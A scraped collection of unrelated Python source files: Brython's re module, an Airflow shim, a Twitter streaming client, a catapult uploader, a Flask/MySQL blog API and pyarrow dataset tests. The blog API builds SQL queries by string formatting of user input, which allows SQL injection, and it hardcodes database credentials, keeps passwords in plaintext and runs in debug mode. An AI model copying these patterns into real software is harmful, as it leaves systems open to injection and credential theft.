bytes patterns or string patterns with the ASCII flag.
In string patterns without the ASCII flag, it will match the whole
range of Unicode digits.
\D Matches any non-digit character; equivalent to [^\d].
\s Matches any whitespace character; equivalent to [ \t\n\r\f\v] in
bytes patterns or string patterns with the ASCII flag.
In string patterns without the ASCII flag, it will match the whole
range of Unicode whitespace characters.
\S Matches any non-whitespace character; equivalent to [^\s].
\w Matches any alphanumeric character; equivalent to [a-zA-Z0-9_]
in bytes patterns or string patterns with the ASCII flag.
In string patterns without the ASCII flag, it will match the
range of Unicode alphanumeric characters (letters plus digits
plus underscore).
With LOCALE, it will match the set [0-9_] plus characters defined
as letters for the current locale.
\W Matches the complement of \w.
\\ Matches a literal backslash.
This module exports the following functions:
match Match a regular expression pattern to the beginning of a string.
search Search a string for the presence of a pattern.
sub Substitute occurrences of a pattern found in a string.
subn Same as sub, but also return the number of substitutions made.
split Split a string by the occurrences of a pattern.
findall Find all occurrences of a pattern in a string.
finditer Return an iterator yielding a match object for each match.
compile Compile a pattern into a RegexObject.
purge Clear the regular expression cache.
escape Backslash all non-alphanumerics in a string.
Some of the functions in this module takes flags as optional parameters:
A ASCII For string patterns, make \w, \W, \b, \B, \d, \D
match the corresponding ASCII character categories
(rather than the whole Unicode categories, which is the
default).
For bytes patterns, this flag is the only available
behaviour and needn't be specified.
I IGNORECASE Perform case-insensitive matching.
L LOCALE Make \w, \W, \b, \B, dependent on the current locale.
M MULTILINE "^" matches the beginning of lines (after a newline)
as well as the string.
"$" matches the end of lines (before a newline) as well
as the end of the string.
S DOTALL "." matches any character at all, including the newline.
X VERBOSE Ignore whitespace and comments for nicer looking RE's.
U UNICODE For compatibility only. Ignored for string patterns (it
is the default), and forbidden for bytes patterns.
This module also defines an exception 'error'.
"""
import sre_compile
import sre_parse
# public symbols
__all__ = [ "match", "search", "sub", "subn", "split", "findall",
"compile", "purge", "template", "escape", "A", "I", "L", "M", "S", "X",
"U", "ASCII", "IGNORECASE", "LOCALE", "MULTILINE", "DOTALL", "VERBOSE",
"UNICODE", "error" ]
__version__ = "2.2.1"
# flags
A = ASCII = sre_compile.SRE_FLAG_ASCII # assume ascii "locale"
I = IGNORECASE = sre_compile.SRE_FLAG_IGNORECASE # ignore case
L = LOCALE = sre_compile.SRE_FLAG_LOCALE # assume current 8-bit locale
U = UNICODE = sre_compile.SRE_FLAG_UNICODE # assume unicode "locale"
M = MULTILINE = sre_compile.SRE_FLAG_MULTILINE # make anchors look for newline
S = DOTALL = sre_compile.SRE_FLAG_DOTALL # make dot match newline
X = VERBOSE = sre_compile.SRE_FLAG_VERBOSE # ignore whitespace and comments
# sre extensions (experimental, don't rely on these)
T = TEMPLATE = sre_compile.SRE_FLAG_TEMPLATE # disable backtracking
DEBUG = sre_compile.SRE_FLAG_DEBUG # dump pattern after compilation
# sre exception
error = sre_compile.error
# --------------------------------------------------------------------
# public interface
def match(pattern, string, flags=0):
"""Try to apply the pattern at the start of the string, returning
a match object, or None if no match was found."""
return _compile(pattern, flags).match(string)
def search(pattern, string, flags=0):
"""Scan through string looking for a match to the pattern, returning
a match object, or None if no match was found."""
return _compile(pattern, flags).search(string)
def sub(pattern, repl, string, count=0, flags=0):
"""Return the string obtained by replacing the leftmost
non-overlapping occurrences of the pattern in string by the
replacement repl. repl can be either a string or a callable;
if a string, backslash escapes in it are processed. If it is
a callable, it's passed the match object and must return
a replacement string to be used."""
return _compile(pattern, flags).sub(repl, string, count)
def subn(pattern, repl, string, count=0, flags=0):
"""Return a 2-tuple containing (new_string, number).
new_string is the string obtained by replacing the leftmost
non-overlapping occurrences of the pattern in the source
string by the replacement repl. number is the number of
substitutions that were made. repl can be either a string or a
callable; if a string, backslash escapes in it are processed.
If it is a callable, it's passed the match object and must
return a replacement string to be used."""
return _compile(pattern, flags).subn(repl, string, count)
def split(pattern, string, maxsplit=0, flags=0):
"""Split the source string by the occurrences of the pattern,
returning a list containing the resulting substrings. If
capturing parentheses are used in pattern, then the text of all
groups in the pattern are also returned as part of the resulting
list. If maxsplit is nonzero, at most maxsplit splits occur,
and the remainder of the string is returned as the final element
of the list."""
return _compile(pattern, flags).split(string, maxsplit)
def findall(pattern, string, flags=0):
"""Return a list of all non-overlapping matches in the string.
If one or more capturing groups are present in the pattern, return
a list of groups; this will be a list of tuples if the pattern
has more than one group.
Empty matches are included in the result."""
return _compile(pattern, flags).findall(string)
def finditer(pattern, string, flags=0):
"""Return an iterator over all non-overlapping matches in the
string. For each match, the iterator returns a match object.
Empty matches are included in the result."""
return _compile(pattern, flags).finditer(string)
def compile(pattern, flags=0):
"Compile a regular expression pattern, returning a pattern object."
#print("_re.py:214")
return _compile(pattern, flags)
def purge():
"Clear the regular expression caches"
_cache.clear()
_cache_repl.clear()
def template(pattern, flags=0):
"Compile a template pattern, returning a pattern object"
return _compile(pattern, flags|T)
_alphanum_str = frozenset(
"_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890")
_alphanum_bytes = frozenset(
b"_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890")
def escape(pattern):
"""
Escape all the characters in pattern except ASCII letters, numbers and '_'.
"""
if isinstance(pattern, str):
alphanum = _alphanum_str
s = list(pattern)
for i, c in enumerate(pattern):
if c not in alphanum:
if c == "\000":
s[i] = "\\000"
else:
s[i] = "\\" + c
return "".join(s)
else:
alphanum = _alphanum_bytes
s = []
esc = ord(b"\\")
for c in pattern:
if c in alphanum:
s.append(c)
else:
if c == 0:
s.extend(b"\\000")
else:
s.append(esc)
s.append(c)
return bytes(s)
# --------------------------------------------------------------------
# internals
_cache = {}
_cache_repl = {}
_pattern_type = type(sre_compile.compile("", 0))
_MAXCACHE = 512
def _compile(pattern, flags):
# internal: compile pattern
try:
#fixme brython
#return _cache[type(pattern), pattern, flags]
return _cache["%s:%s:%s" % (type(pattern), pattern, flags)]
except KeyError:
pass
#print(pattern)
if isinstance(pattern, _pattern_type):
if flags:
raise ValueError(
"Cannot process flags argument with a compiled pattern")
return pattern
if not sre_compile.isstring(pattern):
raise TypeError("first argument must be string or compiled pattern")
p = sre_compile.compile(pattern, flags)
#print('_compile', p)
if len(_cache) >= _MAXCACHE:
_cache.clear()
#fix me brython
#_cache[type(pattern), pattern, flags] = p
_cache["%s:%s:%s" % (type(pattern), pattern, flags)]= p
return p
def _compile_repl(repl, pattern):
# internal: compile replacement pattern
try:
#fix me brython
#return _cache_repl[repl, pattern]
return _cache_repl["%s:%s" % (repl, pattern)]
except KeyError:
pass
p = sre_parse.parse_template(repl, pattern)
if len(_cache_repl) >= _MAXCACHE:
_cache_repl.clear()
_cache_repl["%s:%s" % (repl, pattern)] = p
#fix me brython
#_cache_repl[repl, pattern] = p
return p
def _expand(pattern, match, template):
# internal: match.expand implementation hook
template = sre_parse.parse_template(template, pattern)
return sre_parse.expand_template(template, match)
def _subx(pattern, template):
# internal: pattern.sub/subn implementation helper
template = _compile_repl(template, pattern)
if not template[0] and len(template[1]) == 1:
# literal replacement
return template[1][0]
def filter(match, template=template):
return sre_parse.expand_template(template, match)
return filter
# register myself for pickling
import copyreg
def _pickle(p):
return _compile, (p.pattern, p.flags)
copyreg.pickle(_pattern_type, _pickle, _compile)
# --------------------------------------------------------------------
# experimental stuff (see python-dev discussions for details)
class Scanner:
def __init__(self, lexicon, flags=0):
from sre_constants import BRANCH, SUBPATTERN
self.lexicon = lexicon
# combine phrases into a compound pattern
p = []
s = sre_parse.Pattern()
s.flags = flags
for phrase, action in lexicon:
p.append(sre_parse.SubPattern(s, [
(SUBPATTERN, (len(p)+1, sre_parse.parse(phrase, flags))),
]))
s.groups = len(p)+1
p = sre_parse.SubPattern(s, [(BRANCH, (None, p))])
self.scanner = sre_compile.compile(p)
def scan(self, string):
result = []
append = result.append
match = self.scanner.scanner(string).match
i = 0
while 1:
m = match()
if not m:
break
j = m.end()
if i == j:
break
action = self.lexicon[m.lastindex-1][1]
if callable(action):
self.match = m
action = action(self, m.group())
if action is not None:
append(action)
i = j
return result, string[i:]
| {
"content_hash": "a511f29c72b4c42e3dce3f70c8a7b1c0",
"timestamp": "",
"source": "github",
"line_count": 352,
"max_line_length": 79,
"avg_line_length": 42.59375,
"alnum_prop": 0.6202894684185953,
"repo_name": "nattee/cafe-grader-web",
"id": "0d27092b0778eaf6dbc171ae6eae763f1aa1331d",
"size": "15507",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "lib/assets/Lib/re.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "6421"
},
{
"name": "CoffeeScript",
"bytes": "3519"
},
{
"name": "HTML",
"bytes": "9510"
},
{
"name": "Haml",
"bytes": "132419"
},
{
"name": "JavaScript",
"bytes": "638225"
},
{
"name": "Python",
"bytes": "5145901"
},
{
"name": "Ruby",
"bytes": "318252"
},
{
"name": "SCSS",
"bytes": "12285"
}
],
"symlink_target": ""
} |
"""This module is deprecated. Please use `airflow.gcp.hooks.datastore`."""
import warnings
# pylint: disable=unused-import
from airflow.gcp.hooks.datastore import DatastoreHook # noqa
warnings.warn(
"This module is deprecated. Please use `airflow.gcp.hooks.datastore`.",
DeprecationWarning, stacklevel=2
)
| {
"content_hash": "b8c4349ca73371d3ff8f8539992124ed",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 75,
"avg_line_length": 28.90909090909091,
"alnum_prop": 0.7578616352201258,
"repo_name": "Fokko/incubator-airflow",
"id": "da521195fc678c923a8327dd9382e539b3eecf65",
"size": "1129",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "airflow/contrib/hooks/datastore_hook.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13715"
},
{
"name": "Dockerfile",
"bytes": "14170"
},
{
"name": "HTML",
"bytes": "145596"
},
{
"name": "JavaScript",
"bytes": "25233"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "8787104"
},
{
"name": "Shell",
"bytes": "187296"
},
{
"name": "TSQL",
"bytes": "879"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from .util import PY_3_OR_HIGHER
if PY_3_OR_HIGHER:
import urllib.request as urllib_request
import urllib.error as urllib_error
else:
import urllib2 as urllib_request
import urllib2 as urllib_error
import json
from ssl import SSLError
import socket
import codecs
import sys, select, time
from .api import TwitterCall, wrap_response, TwitterHTTPError
CRLF = b'\r\n'
MIN_SOCK_TIMEOUT = 0.0 # Apparenty select with zero wait is okay!
MAX_SOCK_TIMEOUT = 10.0
HEARTBEAT_TIMEOUT = 90.0
Timeout = {'timeout': True}
Hangup = {'hangup': True}
DecodeError = {'hangup': True, 'decode_error': True}
HeartbeatTimeout = {'hangup': True, 'heartbeat_timeout': True}
class HttpChunkDecoder(object):
def __init__(self):
self.buf = bytearray()
self.munch_crlf = False
def decode(self, data): # -> (bytearray, end_of_stream, decode_error)
chunks = []
buf = self.buf
munch_crlf = self.munch_crlf
end_of_stream = False
decode_error = False
buf.extend(data)
while True:
if munch_crlf:
# Dang, Twitter, you crazy. Twitter only sends a terminating
# CRLF at the beginning of the *next* message.
if len(buf) >= 2:
buf = buf[2:]
munch_crlf = False
else:
break
header_end_pos = buf.find(CRLF)
if header_end_pos == -1:
break
header = buf[:header_end_pos]
data_start_pos = header_end_pos + 2
try:
chunk_len = int(header.decode('ascii'), 16)
except ValueError:
decode_error = True
break
if chunk_len == 0:
end_of_stream = True
break
data_end_pos = data_start_pos + chunk_len
if len(buf) >= data_end_pos:
chunks.append(buf[data_start_pos:data_end_pos])
buf = buf[data_end_pos:]
munch_crlf = True
else:
break
self.buf = buf
self.munch_crlf = munch_crlf
return bytearray().join(chunks), end_of_stream, decode_error
class JsonDecoder(object):
def __init__(self):
self.buf = ""
self.raw_decode = json.JSONDecoder().raw_decode
def decode(self, data):
chunks = []
buf = self.buf + data
while True:
try:
buf = buf.lstrip()
res, ptr = self.raw_decode(buf)
buf = buf[ptr:]
chunks.append(res)
except ValueError:
break
self.buf = buf
return chunks
class Timer(object):
def __init__(self, timeout):
# If timeout is None, we never expire.
self.timeout = timeout
self.reset()
def reset(self):
self.time = time.time()
def expired(self):
"""
If expired, reset the timer and return True.
"""
if self.timeout is None:
return False
elif time.time() - self.time > self.timeout:
self.reset()
return True
return False
class SockReader(object):
def __init__(self, sock, sock_timeout):
self.sock = sock
self.sock_timeout = sock_timeout
def read(self):
try:
ready_to_read = select.select([self.sock], [], [], self.sock_timeout)[0]
if ready_to_read:
return self.sock.read()
except SSLError as e:
# Code 2 is error from a non-blocking read of an empty buffer.
if e.errno != 2:
raise
return bytearray()
class TwitterJSONIter(object):
def __init__(self, handle, uri, arg_data, block, timeout, heartbeat_timeout):
self.handle = handle
self.uri = uri
self.arg_data = arg_data
self.timeout_token = Timeout
self.timeout = None
self.heartbeat_timeout = HEARTBEAT_TIMEOUT
if timeout and timeout > 0:
self.timeout = float(timeout)
elif not (block or timeout):
self.timeout_token = None
self.timeout = MIN_SOCK_TIMEOUT
if heartbeat_timeout and heartbeat_timeout > 0:
self.heartbeat_timeout = float(heartbeat_timeout)
def __iter__(self):
timeouts = [t for t in (self.timeout, self.heartbeat_timeout, MAX_SOCK_TIMEOUT)
if t is not None]
sock_timeout = min(*timeouts)
sock = self.handle.fp.raw._sock if PY_3_OR_HIGHER else self.handle.fp._sock.fp._sock
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
headers = self.handle.headers
sock_reader = SockReader(sock, sock_timeout)
chunk_decoder = HttpChunkDecoder()
utf8_decoder = codecs.getincrementaldecoder("utf-8")()
json_decoder = JsonDecoder()
timer = Timer(self.timeout)
heartbeat_timer = Timer(self.heartbeat_timeout)
while True:
# Decode all the things:
try:
data = sock_reader.read()
except SSLError:
yield Hangup
break
dechunked_data, end_of_stream, decode_error = chunk_decoder.decode(data)
unicode_data = utf8_decoder.decode(dechunked_data)
json_data = json_decoder.decode(unicode_data)
# Yield data-like things:
for json_obj in json_data:
yield wrap_response(json_obj, headers)
# Reset timers:
if dechunked_data:
heartbeat_timer.reset()
if json_data:
timer.reset()
# Yield timeouts and special things:
if end_of_stream:
yield Hangup
break
if decode_error:
yield DecodeError
break
if heartbeat_timer.expired():
yield HeartbeatTimeout
break
if timer.expired():
yield self.timeout_token
def handle_stream_response(req, uri, arg_data, block, timeout, heartbeat_timeout):
try:
handle = urllib_request.urlopen(req,)
except urllib_error.HTTPError as e:
raise TwitterHTTPError(e, uri, 'json', arg_data)
return iter(TwitterJSONIter(handle, uri, arg_data, block, timeout, heartbeat_timeout))
class TwitterStream(TwitterCall):
"""
The TwitterStream object is an interface to the Twitter Stream
API. This can be used pretty much the same as the Twitter class
except the result of calling a method will be an iterator that
yields objects decoded from the stream. For example::
twitter_stream = TwitterStream(auth=OAuth(...))
iterator = twitter_stream.statuses.sample()
for tweet in iterator:
# ...do something with this tweet...
Per default the ``TwitterStream`` object uses
[public streams](https://dev.twitter.com/docs/streaming-apis/streams/public).
If you want to use one of the other
[streaming APIs](https://dev.twitter.com/docs/streaming-apis), specify the URL
manually.
The iterator will yield until the TCP connection breaks. When the
connection breaks, the iterator yields `{'hangup': True}`, and
raises `StopIteration` if iterated again.
Similarly, if the stream does not produce heartbeats for more than
90 seconds, the iterator yields `{'hangup': True,
'heartbeat_timeout': True}`, and raises `StopIteration` if
iterated again.
The `timeout` parameter controls the maximum time between
yields. If it is nonzero, then the iterator will yield either
stream data or `{'timeout': True}` within the timeout period. This
is useful if you want your program to do other stuff in between
waiting for tweets.
The `block` parameter sets the stream to be fully non-blocking. In
this mode, the iterator always yields immediately. It returns
stream data, or `None`. Note that `timeout` supercedes this
argument, so it should also be set `None` to use this mode.
"""
def __init__(self, domain="stream.twitter.com", secure=True, auth=None,
api_version='1.1', block=True, timeout=None,
heartbeat_timeout=90.0):
uriparts = (str(api_version),)
class TwitterStreamCall(TwitterCall):
def _handle_response(self, req, uri, arg_data, _timeout=None):
return handle_stream_response(
req, uri, arg_data, block,
_timeout or timeout, heartbeat_timeout)
TwitterCall.__init__(
self, auth=auth, format="json", domain=domain,
callable_cls=TwitterStreamCall,
secure=secure, uriparts=uriparts, timeout=timeout, gzip=False)
| {
"content_hash": "f8726a1e97210176da93c593db26110b",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 92,
"avg_line_length": 33.26865671641791,
"alnum_prop": 0.5833333333333334,
"repo_name": "sixohsix/twitter",
"id": "142cf1f674de874cfe4edea1c377995f2d005ac4",
"size": "8934",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "twitter/stream.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "143642"
}
],
"symlink_target": ""
} |
import logging
import os
from catapult_base import cloud_storage
from catapult_base.dependency_manager import exceptions
BACKUP_PATH_EXTENSION = 'old'
class CloudStorageUploader(object):
def __init__(self, bucket, remote_path, local_path, cs_backup_path=None):
if not bucket or not remote_path or not local_path:
raise ValueError(
'Attempted to partially initialize upload data with bucket %s, '
'remote_path %s, and local_path %s', bucket, remote_path, local_path)
if not os.path.exists(local_path):
raise ValueError('Attempting to initilize UploadInfo with missing '
'local path %s', local_path)
self._cs_bucket = bucket
self._cs_remote_path = remote_path
self._local_path = local_path
self._cs_backup_path = (cs_backup_path or
'%s.%s' % (self._cs_remote_path,
BACKUP_PATH_EXTENSION))
self._updated = False
self._backed_up = False
def Upload(self, force=False):
"""Upload all pending files and then write the updated config to disk.
Will attempt to copy files existing in the upload location to a backup
location in the same bucket in cloud storage if |force| is True.
Args:
force: True if files should be uploaded to cloud storage even if a
file already exists in the upload location.
Raises:
CloudStorageUploadConflictError: If |force| is False and the potential
upload location of a file already exists.
CloudStorageError: If copying an existing file to the backup location
or uploading the new file fails.
"""
if cloud_storage.Exists(self._cs_bucket, self._cs_remote_path):
if not force:
raise exceptions.CloudStorageUploadConflictError(self._cs_bucket,
self._cs_remote_path)
logging.debug('A file already exists at upload path %s in self.cs_bucket'
' %s', self._cs_remote_path, self._cs_bucket)
try:
cloud_storage.Copy(self._cs_bucket, self._cs_bucket,
self._cs_remote_path, self._cs_backup_path)
self._backed_up = True
except cloud_storage.CloudStorageError:
logging.error('Failed to copy existing file %s in cloud storage bucket '
'%s to backup location %s', self._cs_remote_path, self._cs_bucket,
self._cs_backup_path)
raise
try:
cloud_storage.Insert(
self._cs_bucket, self._cs_remote_path, self._local_path)
except cloud_storage.CloudStorageError:
logging.error('Failed to upload %s to %s in cloud_storage bucket %s',
self._local_path, self._cs_remote_path, self._cs_bucket)
raise
self._updated = True
def Rollback(self):
"""Attempt to undo the previous call to Upload.
Does nothing if no previous call to Upload was made, or if nothing was
successfully changed.
Returns:
True iff changes were successfully rolled back.
Raises:
CloudStorageError: If copying the backed up file to its original
location or removing the uploaded file fails.
"""
cloud_storage_changed = False
if self._backed_up:
cloud_storage.Copy(self._cs_bucket, self._cs_bucket, self._cs_backup_path,
self._cs_remote_path)
cloud_storage_changed = True
self._cs_backup_path = None
elif self._updated:
cloud_storage.Delete(self._cs_bucket, self._cs_remote_path)
cloud_storage_changed = True
self._updated = False
return cloud_storage_changed
def __eq__(self, other, msg=None):
if type(self) != type(other):
return False
return (self._local_path == other._local_path and
self._cs_remote_path == other._cs_remote_path and
self._cs_bucket == other._cs_bucket)
| {
"content_hash": "c82e38b6520c7cbe64e3e33c2b03fd7f",
"timestamp": "",
"source": "github",
"line_count": 102,
"max_line_length": 80,
"avg_line_length": 38.22549019607843,
"alnum_prop": 0.6334957681456784,
"repo_name": "XiaosongWei/chromium-crosswalk",
"id": "08e9c8f6b35d5159a1af8a40cf240a8e92de1e84",
"size": "4062",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "tools/telemetry/catapult_base/dependency_manager/uploader.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from flask import Flask, jsonify, request,make_response
from flask.ext.httpauth import HTTPBasicAuth
import json
import MySQLdb
from flask.ext.cors import CORS
app = Flask(__name__)
CORS(app)
#create a temporary users table
users = {"jtramley":"password"}
#MySQL connection information.
#host='localhost',user='jtramley',passwd='ckd9OY5fz',db='jtramley'
hosta='localhost'
usera='bmoore1'
passwda='Q8vdnRru7'
dba='bmoore1'
#setup authentication process
auth = HTTPBasicAuth()
@auth.get_password
def get_password(username):
#if the username is in the users table, return the password.
connection = MySQLdb.connect(host=hosta,user=usera,passwd=passwda,db=dba)
cursor = connection.cursor()
query = "select Password from users where Username='%s'" %(username)
#query = "getPassword('%s')" %(username)
try:
cursor.execute(query)
except:
#Things messed up
return make_response(jsonify({'error':'Failed!'}),404)
returned = cursor.fetchone()
#if the username was wrong
if (cursor.rowcount == 0):
return None
if returned[0] == '':
return None
return returned[0]
@auth.error_handler
def unauthorized():
return make_response(jsonify({'error':'Bad username or password.'}),403)
# Some error handlers
@app.errorhandler(400)
def not_found(error):
return make_response(jsonify( { 'error': 'Bad request' } ), 400)
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify( { 'error': 'Not found' } ), 404)
@app.route('/login', methods=['GET','POST'])
@auth.login_required
def login():
if request.method == 'POST':
return make_response(jsonify({'error':'Success!'}),201)
else:
return make_response(jsonify({'error':'Failed!'}),404)
@app.route('/blog', methods=['POST','DELETE'])
@auth.login_required
def blog():
if request.method == 'POST':
#for command line:
# curl -u jtramley:"password" -H "Content-Type: application/json" -X POST -d '{"username":"jtramley", "title":"my first post", "content":"So this is my first blog "}' http://localhost:5000/blog
username = auth.username()
title = request.json.get('title',"")
print 'got title'
content = request.json.get('content',"")
print 'gpt content'
query = "insert into entries values(DEFAULT,'%s','%s','%s',DEFAULT)" %(title,content,username)
print 'request parsed'
connection = MySQLdb.connect(host=hosta,user=usera,passwd=passwda,db=dba, use_unicode=True, charset='utf8')
cursor = connection.cursor()
print 'connection created'
try:
cursor.execute(query)
print 'executed query'
except:
# Things messed up
return make_response(jsonify({"error":"Database Connection failure"}),500)
cursor.close()
connection.close()
return make_response(jsonify({'error':'Success!'}),201)
if request.method == 'DELETE':
username = auth.username()
entryID = request.json.get('entryID',"")
connection = MySQLdb.connect(host=hosta,user=usera,passwd=passwda,db=dba, use_unicode=True, charset='utf8')
cursor = connection.cursor()
query = "select * from entries where EntryID='%s' and User='%s'" %(entryID,username)
try:
cursor.execute(query)
except:
return make_response(jsonify({"error":"Database Connection failure"}),500)
if (cursor.rowcount != 0):
query = "delete from entries where EntryID='%s' and User='%s'" %(entryID,username)
try:
cursor.execute(query)
except:
return make_response(jsonify({"error":"Database Connection failure"}),500)
cursor.close()
connection.close()
return make_response(jsonify({'error':'Success!'}),201)
else:
return make_response(jsonify({'error':'Failed!'}),403)
#Return entries by User each page will have 5 entries.
@app.route('/blog/<username>/<int:page>')
def getEntries(username, page):
connection = MySQLdb.connect(host=hosta,user=usera,passwd=passwda,db=dba)
cursor = connection.cursor(MySQLdb.cursors.DictCursor)
query = "call getEntryByUser('%s')" %(username)
try:
cursor.execute(query)
except:
# Things messed up
return make_response(jsonify({"error":"Database Connection failure"}),500)
set = cursor.fetchall()
entries = []
i = (page-1) * 5
while(i < page*5 and i < len(set)):
entries.append(set[i])
i+=1
cursor.close()
connection.close()
return jsonify({'entry': entries})
if __name__ == '__main__':
app.run(host='info3103.cs.unb.ca', port=1319, debug=True)
| {
"content_hash": "bbac8c440da2296a6c2b9b82fe58922c",
"timestamp": "",
"source": "github",
"line_count": 157,
"max_line_length": 196,
"avg_line_length": 27.738853503184714,
"alnum_prop": 0.6920780711825488,
"repo_name": "DevMoore94/FlaskBlog",
"id": "46ab19c33f6785790dfdd3e13f67585d3e018dc0",
"size": "4377",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blog.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "152618"
},
{
"name": "HTML",
"bytes": "8934"
},
{
"name": "Python",
"bytes": "4377"
}
],
"symlink_target": ""
} |
import contextlib
import os
import posixpath
import datetime
import pathlib
import pickle
import sys
import textwrap
import tempfile
import threading
import time
import numpy as np
import pytest
import pyarrow as pa
import pyarrow.compute as pc
import pyarrow.csv
import pyarrow.feather
import pyarrow.fs as fs
from pyarrow.tests.util import (change_cwd, _filesystem_uri,
FSProtocolClass, ProxyHandler,
_configure_s3_limited_user)
try:
import pandas as pd
except ImportError:
pd = None
try:
import pyarrow.dataset as ds
except ImportError:
ds = None
try:
import pyarrow.parquet as pq
except ImportError:
pq = None
# Marks all of the tests in this module
# Ignore these with pytest ... -m 'not dataset'
pytestmark = pytest.mark.dataset
def _generate_data(n):
import datetime
import itertools
day = datetime.datetime(2000, 1, 1)
interval = datetime.timedelta(days=5)
colors = itertools.cycle(['green', 'blue', 'yellow', 'red', 'orange'])
data = []
for i in range(n):
data.append((day, i, float(i), next(colors)))
day += interval
return pd.DataFrame(data, columns=['date', 'index', 'value', 'color'])
def _table_from_pandas(df):
schema = pa.schema([
pa.field('date', pa.date32()),
pa.field('index', pa.int64()),
pa.field('value', pa.float64()),
pa.field('color', pa.string()),
])
table = pa.Table.from_pandas(df, schema=schema, preserve_index=False)
return table.replace_schema_metadata()
@pytest.fixture
@pytest.mark.parquet
def mockfs():
mockfs = fs._MockFileSystem()
directories = [
'subdir/1/xxx',
'subdir/2/yyy',
]
for i, directory in enumerate(directories):
path = '{}/file{}.parquet'.format(directory, i)
mockfs.create_dir(directory)
with mockfs.open_output_stream(path) as out:
data = [
list(range(5)),
list(map(float, range(5))),
list(map(str, range(5))),
[i] * 5,
[{'a': j % 3, 'b': str(j % 3)} for j in range(5)],
]
schema = pa.schema([
('i64', pa.int64()),
('f64', pa.float64()),
('str', pa.string()),
('const', pa.int64()),
('struct', pa.struct({'a': pa.int64(), 'b': pa.string()})),
])
batch = pa.record_batch(data, schema=schema)
table = pa.Table.from_batches([batch])
pq.write_table(table, out)
return mockfs
@pytest.fixture
def open_logging_fs(monkeypatch):
from pyarrow.fs import PyFileSystem, LocalFileSystem
from .test_fs import ProxyHandler
localfs = LocalFileSystem()
def normalized(paths):
return {localfs.normalize_path(str(p)) for p in paths}
opened = set()
def open_input_file(self, path):
path = localfs.normalize_path(str(path))
opened.add(path)
return self._fs.open_input_file(path)
# patch proxyhandler to log calls to open_input_file
monkeypatch.setattr(ProxyHandler, "open_input_file", open_input_file)
fs = PyFileSystem(ProxyHandler(localfs))
@contextlib.contextmanager
def assert_opens(expected_opened):
opened.clear()
try:
yield
finally:
assert normalized(opened) == normalized(expected_opened)
return fs, assert_opens
@pytest.fixture(scope='module')
def multisourcefs(request):
request.config.pyarrow.requires('pandas')
request.config.pyarrow.requires('parquet')
df = _generate_data(1000)
mockfs = fs._MockFileSystem()
# simply split the dataframe into four chunks to construct a data source
# from each chunk into its own directory
df_a, df_b, df_c, df_d = np.array_split(df, 4)
# create a directory containing a flat sequence of parquet files without
# any partitioning involved
mockfs.create_dir('plain')
for i, chunk in enumerate(np.array_split(df_a, 10)):
path = 'plain/chunk-{}.parquet'.format(i)
with mockfs.open_output_stream(path) as out:
pq.write_table(_table_from_pandas(chunk), out)
# create one with schema partitioning by weekday and color
mockfs.create_dir('schema')
for part, chunk in df_b.groupby([df_b.date.dt.dayofweek, df_b.color]):
folder = 'schema/{}/{}'.format(*part)
path = '{}/chunk.parquet'.format(folder)
mockfs.create_dir(folder)
with mockfs.open_output_stream(path) as out:
pq.write_table(_table_from_pandas(chunk), out)
# create one with hive partitioning by year and month
mockfs.create_dir('hive')
for part, chunk in df_c.groupby([df_c.date.dt.year, df_c.date.dt.month]):
folder = 'hive/year={}/month={}'.format(*part)
path = '{}/chunk.parquet'.format(folder)
mockfs.create_dir(folder)
with mockfs.open_output_stream(path) as out:
pq.write_table(_table_from_pandas(chunk), out)
# create one with hive partitioning by color
mockfs.create_dir('hive_color')
for part, chunk in df_d.groupby("color"):
folder = 'hive_color/color={}'.format(part)
path = '{}/chunk.parquet'.format(folder)
mockfs.create_dir(folder)
with mockfs.open_output_stream(path) as out:
pq.write_table(_table_from_pandas(chunk), out)
return mockfs
@pytest.fixture
@pytest.mark.parquet
def dataset(mockfs):
format = ds.ParquetFileFormat()
selector = fs.FileSelector('subdir', recursive=True)
options = ds.FileSystemFactoryOptions('subdir')
options.partitioning = ds.DirectoryPartitioning(
pa.schema([
pa.field('group', pa.int32()),
pa.field('key', pa.string())
])
)
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
return factory.finish()
@pytest.fixture(params=[
(True),
(False)
], ids=['threaded', 'serial'])
def dataset_reader(request):
'''
Fixture which allows dataset scanning operations to be
run with/without threads
'''
use_threads = request.param
class reader:
def __init__(self):
self.use_threads = use_threads
def _patch_kwargs(self, kwargs):
if 'use_threads' in kwargs:
raise Exception(
('Invalid use of dataset_reader, do not specify'
' use_threads'))
kwargs['use_threads'] = use_threads
def to_table(self, dataset, **kwargs):
self._patch_kwargs(kwargs)
return dataset.to_table(**kwargs)
def to_batches(self, dataset, **kwargs):
self._patch_kwargs(kwargs)
return dataset.to_batches(**kwargs)
def scanner(self, dataset, **kwargs):
self._patch_kwargs(kwargs)
return dataset.scanner(**kwargs)
def head(self, dataset, num_rows, **kwargs):
self._patch_kwargs(kwargs)
return dataset.head(num_rows, **kwargs)
def take(self, dataset, indices, **kwargs):
self._patch_kwargs(kwargs)
return dataset.take(indices, **kwargs)
def count_rows(self, dataset, **kwargs):
self._patch_kwargs(kwargs)
return dataset.count_rows(**kwargs)
return reader()
@pytest.mark.parquet
def test_filesystem_dataset(mockfs):
schema = pa.schema([
pa.field('const', pa.int64())
])
file_format = ds.ParquetFileFormat()
